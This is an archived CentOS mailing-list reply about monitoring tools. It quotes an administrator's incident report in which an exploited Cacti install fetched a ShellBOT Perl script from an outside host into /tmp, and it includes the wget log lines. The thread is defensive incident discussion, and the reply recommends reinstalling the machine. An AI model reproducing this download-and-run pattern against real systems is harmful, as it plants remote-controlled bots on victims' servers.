Re: Suggested way to remotely monitor servers and networks these days?

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index] 

On Thu, 24 May 2007, Dexter Ang wrote:


Hi folks,

I'm just wondering what is the recommended way of monitoring servers and
networks remotely. My current setup is to install and configure cacti and
nagios. I've set these up to require SSL. This way, I can easily go to them
and login from wherever I am and monitor (almost) everything I need to
monitor.


You might want to look at hobbit. http://sourceforge.net/projects/hobbitmon/

I find it much easier to manage than nagios. Besides the UI looks nicer. :-)



The problem is that leaving cacti open was the most stupid thing I've done.
After checking /var/log/httpd/error_log, I saw that someone exploited a
cacti php file and the result was:

--08:13:11--  http://psaico.host.sk/desk.pl
         => `/tmp/desk.pl'
Resolving psaico.host.sk... 62.168.109.150
Connecting to psaico.host.sk|62.168.109.150|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20,144 (20K) [text/x-perl]

  0K .......... .........                                  100%   28.26KB/s

08:13:13 (28.26 KB/s) - `/tmp/desk.pl' saved [20144/20144]

which immediately downloaded ShellBOT to /tmp and executed it. It was a good
thing I caught this as early as I did. So, what's everyone elses solution
these days? Or is it simply a matter of creating a /tmp partition and
mounting it noexec?

On a side note... anyone with experience with ShellBOT? From research, it
seems to attempt to connect to an IRC server upon running. So if my outgoing
connections are secured by iptables, can I assume it never got connected at
all? I'll probably try this out someday but just looking for a quick
experienced answer.
It does not matter if they connected or not. The bottom line the machine was hacked and someting got installed that does not belong there. There is no way at this point to be sure that they did not install something else or modify binaries to hide their tracks. 

So now the only to be sure there is not something in that machine is to reload
it. Anything less and you will never know for sure.

Regards,

--
Tom Diehl		tdiehl@xxxxxxxxxxxx		Spamtrap address mtd123@xxxxxxxxxxxx
_______________________________________________
CentOS mailing list
CentOS@xxxxxxxxxx
http://lists.centos.org/mailman/listinfo/centos
[Index of Archives]     [CentOS]     [CentOS Announce]     [CentOS Development]     [CentOS ARM Devel]     [CentOS Docs]     [CentOS Virtualization]     [Carrier Grade Linux]     [Linux Media]     [Asterisk]     [DCCP]     [Netdev]     [Xorg]     [Linux USB]
  Powered by Linux